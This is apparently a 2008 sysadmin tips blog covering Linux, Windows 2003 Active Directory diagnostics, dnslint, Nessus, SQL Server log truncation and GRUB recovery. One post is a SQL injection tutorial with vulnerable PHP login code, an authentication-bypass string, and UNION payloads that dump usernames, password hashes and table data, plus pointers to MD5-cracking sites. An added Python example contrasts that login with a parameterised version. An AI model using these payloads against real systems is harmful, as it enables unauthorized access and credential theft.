Thursday, December 18, 2008

Linux - Find BIG files

A little tip for Linux:

To find large files on a system we can do:

$ find / -type f -size +20000k -exec ls -lh {} \;

We can also run it against another filesystem, like /home or /tmp.

Monday, September 22, 2008

win2003 AD cheat sheet =D


Some diags I like to run on Win2003 AD:


==== Diags Commands ====
Check - c:\windows\NTDS - ntds.dit / edb.xxx
Check - c:\windows\SYSVOL\sysvol\domain.local - subfolders
  share - NETLOGON -> c:\windows\SYSVOL\sysvol\domain.local\SCRIPTS
  share - SYSVOL -> c:\windows\SYSVOL\sysvol
Check - DNS console - SRV records - _msdcs.domain.local
= nslookup
    nslookup gc._msdcs
= DCDIAG /C /V                          (tests on the DC)
= NETDIAG /v /debug > netdiag.txt
= dcdiag /test:replications
    other tests: topology, cutoffserver, netlogons, fsmocheck, DNS, frssysvol, frsevent, kccevent, systemlog, RegisterInDNS
= repadmin /replsum
= repadmin /showrepl
= REPADMIN /SYNCALL /A /e /d /q
= REPADMIN /SYNCALL /A /e /d /q /P
= repadmin /replicate TargetDC SourceDC NamingContext /force
= repadmin /showconn
= repadmin /showreps
= netdom query FSMO
= netdom verify DSTBDC /domain:domain.local
= netdom query DC
= nltest /DSGETDC:domain.local
= dnslint /ad /s localhost /v
= dnslint /d domain.local /s 10.30.1.217 /v
explore
= dcdiag
= netdiag
= w32tm /config /syncfromflags:manual /manualpeerlist:10.1.1.1
= w32tm /config /update
= w32tm /dumpreg /subkey:parameters
= w32tm /monitor
----- Test Exchange "Service Principal Names" - LDAP -----
setspn -L "servername"
setspn -?
Netsh - http://technet.microsoft.com/en-us/library/bb491071.aspx

Friday, July 11, 2008

Dnslint - Utility

The dnslint (Windows 2003) utility tests various DNS settings.

To use it we can try the following:

> dnslint /d "domain.name" /s 10.1.1.1 /c

Explanation of the flags used:
- /d sets the domain to test
- /s bypasses the InterNIC whois lookup and uses 10.1.1.1 as the DNS server
- /c tests the mail servers

It can be used to test a lot more; with the /ad flag it will query Active Directory.

There are a lot more flags; just run
> dnslint /? |more

to see the options.

Tuesday, July 1, 2008

Nessus commands

EXAMPLE
To perform a command-line scan against 192.168.0.0/24, do the following:
echo 192.168.0.0/24 > targets.txt


nessus -xq localhost 1241 yourLogin yourPassword targets.txt report.txt

Sql Server - Truncate Log Files

SQL Server:

"Clean LOG Files"

Examples:


backup log BizTalkMsgBoxDb with truncate_only

DBCC SHRINKFILE (BizTalkMsgBoxDb_log, 200)

Also do this on the "BizTalkDTADb" database:

backup log BizTalkDTADb with truncate_only

DBCC SHRINKFILE (BizTalkDTADb_log, 200)

Also do this on the "BizTalkMgmtDb" database:

use BizTalkMgmtDb

backup log BizTalkMgmtDb with truncate_only

DBCC SHRINKFILE (BizTalkMgmtDb_log, 100)

...

Etc


Examples of commands that can "help":

use BizTalkMgmtDb

backup log BizTalkMgmtDb with truncate_only

DBCC SHRINKFILE (BizTalkMgmtDb_log, 100)

use RNT_EXCEPTION;

backup log RNT_EXCEPTION with truncate_only

DBCC SHRINKFILE (DotNetNuke_log, 100)

use master;

select * from sysfiles;

select * from sysdatabases;

EXEC sp_databases;


EXEC sp_helpdb;

Monday, June 30, 2008

SQL inject - test

Sample PHP code for authenticating a user during login

$sql = "SELECT * FROM accounts WHERE username='".$_GET['username']."' and password = '".md5($_GET['password'])."'";

If I enter admin for both the username and password, the resulting SQL statement would be as follows:
SELECT * FROM accounts WHERE username='admin' and password = '21232f297a57a5a743894a0e4a801fc3'

If there is a record in accounts with both username and password as admin, then I will get logged in, otherwise the login will fail.

That's all well and good, but there is a very critical problem.
The problem is that there is no validation of what the user inputs, yet that input is used to build the SQL statement.

Let's take a look at the following SQL statement:

SELECT * FROM accounts WHERE username='admin' /* and password = '21232f297a57a5a743894a0e4a801fc3'

What would this statement result in?
First thing to notice is the /*

This is a comment delimiter in MySQL, which means anything following it is considered a comment and is ignored.
Another way to think about it is that the SQL Statement ends at this point.

So if the statement ends at the /*, then the effective SQL statement is:
SELECT * FROM accounts WHERE username='admin'

So when will this generate a valid result?

It will be valid if the username exists in the database, and if it does, then it will return that record.
This means it will log me in as the admin without need for discovering/guessing the password!!

Sounds good, but how would I make the SQL statement look like that? Well, try entering this as your username:
admin' /*
If you look again at the original SQL statement and insert this as the username, you will see how it alters the SQL statement: the statement is still syntactically valid, but its semantic meaning has been altered to suit your needs. Here is what it will look like:
SELECT * FROM accounts WHERE username='admin' /*' and password = '21232f297a57a5a743894a0e4a801fc3'
Now isn't this cool?

Alright, now look at the source code. There's a link to the source on the main page.

Notice that it's displaying the username from the database query result.

This means we can see data from the database. So let's try using a UNION query to get arbitrary data from the database.
When using UNION queries, both sets of data must have exactly the same number of columns.
Since you don't know how many columns are being returned, you have to discover this using the following technique.

How to solve over/under column problems

Start with one field using NULL as its value
admin' UNION SELECT NULL FROM accounts LIMIT 1,1 /*

This will result in the error "The used SELECT statements have a different number of columns".
This tells us that the two data sets do not have a matching number of columns.

Add another NULL
admin' UNION SELECT NULL, NULL FROM accounts LIMIT 1,1 /*

Same error

Add another NULL
admin' UNION SELECT NULL, NULL, NULL FROM accounts LIMIT 1,1 /*

No more error.

Now that we know how many columns we have to work with, let's concat in the data.

With this we get the accounts table records:

admin' UNION SELECT NULL, concat(id, ' - ', username, ' - ', password) AS username, NULL FROM accounts LIMIT 1,1 /*
Notice the last field is the MD5 hash. Here is where the toolkit link to the MD5 hash database comes in handy: http://www.md5decrypt.com/

Put in that MD5 hash and, if it's a common password, you will get a result.

Now let's get another user record by shifting the LIMIT to start on the next record:

admin' UNION SELECT NULL, concat(id, ' - ', username, ' - ', password) AS username, NULL FROM accounts LIMIT 2,1 /*

Now let's get data from an entirely different table:

admin' UNION SELECT NULL, concat(prodid, ' - ', name, ' - ', description, ' - ', price) AS username, NULL FROM inventory LIMIT 1,1 /*

admin' UNION SELECT NULL, concat(prodid, ' - ', name, ' - ', description, ' - ', price) AS username, NULL FROM inventory LIMIT 2,1 /*

As you can see, once you have a SQL injection point you can gain access to a great deal of database information.

nice link: hxxp://www.md5decrypter.com/

hxxp://www.mightyseek.com/podcasts/hands-on-series-sql-injection
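As an added example (not code from the post or the podcast it links), here is the login above rebuilt in Python against a constructed in-memory SQLite table standing in for the MySQL accounts table (SQLite also treats /* as a comment opener, so the bypass behaves the same). The post's string-built query sits beside a parameterised one that the admin' /* username cannot get past.

```python
import hashlib
import sqlite3


def md5_hex(text):
    # Mirrors the md5() call in the post's PHP; kept only to reproduce it.
    return hashlib.md5(text.encode()).hexdigest()


def make_db():
    # Constructed sample data: one "admin"/"admin" account, as in the post.
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE accounts (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.execute(
        "INSERT INTO accounts (username, password) VALUES (?, ?)",
        ("admin", md5_hex("admin")),
    )
    conn.commit()
    return conn


def concat_sql(username, password):
    """Build the statement exactly the way the post's PHP does: raw input pasted in."""
    return (
        "SELECT * FROM accounts WHERE username='" + username
        + "' and password = '" + md5_hex(password) + "'"
    )


def login_concat(conn, username, password):
    """Vulnerable login: whatever the user typed is parsed as SQL, so a
    username of admin' /* turns the password check into a comment."""
    return conn.execute(concat_sql(username, password)).fetchone() is not None


def login_param(conn, username, password):
    """Hardened login: inputs are bound as parameters, so a quote or /* in
    the username is just a string value and never changes the statement."""
    row = conn.execute(
        "SELECT * FROM accounts WHERE username = ? AND password = ?",
        (username, md5_hex(password)),
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    db = make_db()
    for user, pw in (("admin", "admin"), ("admin' /*", "anything")):
        print(f"{user!r:12} concat={login_concat(db, user, pw)} param={login_param(db, user, pw)}")
```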

Sunday, June 29, 2008

Build Install Package - Free

Make an install package file :)

You can just use WinXP and:

1- start -> run
2- iexpress

It starts the wizard, and you can create your install package :)

I've seen this on Hak.5, great site :)

Use Calc to Surf the web

We can use the "calc" program to surf the web:

Open calc:
1 - Menu Help -> Help Topics
2 - Alt+Space
3 - "Jump to URL"

There, just put in your URL and surf!

I've seen this on Hak.5, great site :)



Thursday, June 26, 2008

Windows 2003 utilities

Some commands that are very useful:
diskpart - disk partition
dnslint - dns test / report
nslookup - dns test - interactive
nltest - test - domain / trusts

netsh - net "shell"
netsh firewall show config - show windows firewall configuration

dcdiag - test dc's
netdiag - test network / dc's

ntdsutil - ad utility

To show last replication summary - 0 errors = Good
repadmin /replsum /bysrc /bydest /sort:delta

To show AD Roles, FSMO - Flexible single master operations
netdom query FSMO

To show last replications:
repadmin /showrepl

Wednesday, May 14, 2008

Linux Tip - Burn CDs

-- Create an .iso:

#umount /dev/cdrom
#dd if=/dev/cdrom of=filename.iso bs=1024


-- Create an .iso image file from a "dir":

#mkisofs -r -J -o file.iso /location_of_folder/
-r generates Rock Ridge long names for Linux
-J generates Joliet long names for Windows

-- Mount .iso file without having to burn:
#mkdir /media/iso
#modprobe loop
#mount cdrom.iso /media/iso/ -t iso9660 -o loop

-- To "burn" an .iso to cd:

#cdrecord dev=/dev/cdrom driveropts=burnfree -v -data cd_image.iso

To burn an audio cd from wav files:

#cdrecord dev=/dev/cdrom driveropts=burnfree -v -audio [wav files...]

Replace /dev/cdrom as needed if this is not your CD writer.

-v (verbose) lets you track the recording progress

driveropts=burnfree helps reduce the risk of a buffer under-run (most drives should support this)

Set Time - Win2003

- To set the time in a Windows 2003 server you can use the w32tm command

- w32tm /?
- w32tm /config /manualpeerlist:10.1.1.1 /syncfromflags:MANUAL

- net stop w32time
- net start w32time

- w32tm /resync

And that's it; now your server will set its time from the IP 10.1.1.1.

Tuesday, January 15, 2008

Linux Tip - Get back GRUB after clone

After cloning a Linux HDD, I've booted from the new HDD and got myself a "pretty" GRUB error, the screen just went:
GRUB GRUB GRUB GRUB

and it filled my screen with that.

How to recover the MBR? Here is the solution that I found on the net (google it...)

1. Boot with any live CD (I've done it with Knoppix 3.x and Ubuntu)
2. Get a root shell and make a folder (mkdir ubuntu)
3. Mount the root (/) partition of Ubuntu (e.g. mount /dev/hdb ubuntu if you have two disks)
4. chroot into the mounted partition (chroot ubuntu)
5. grub-install /dev/hda [1]
6. Exit the shell
7. Reboot

That did the trick :)

Thursday, January 3, 2008

Linux Tip - no Beeps on console

To remove the beeps on the console, we can do this:

# setterm -blen 0

Then we can put this line in /etc/rc.d/init.d/rc.local.

Every time your Linux box boots it will run that line, and this will end the beeps on the Linux console.

Linux Tip - Keymap

To change the console keymap in Debian:

# dpkg-reconfigure console-tools

If that doesn't work, perhaps:

# apt-get install console-data console-tools debconf

and
# apt-get update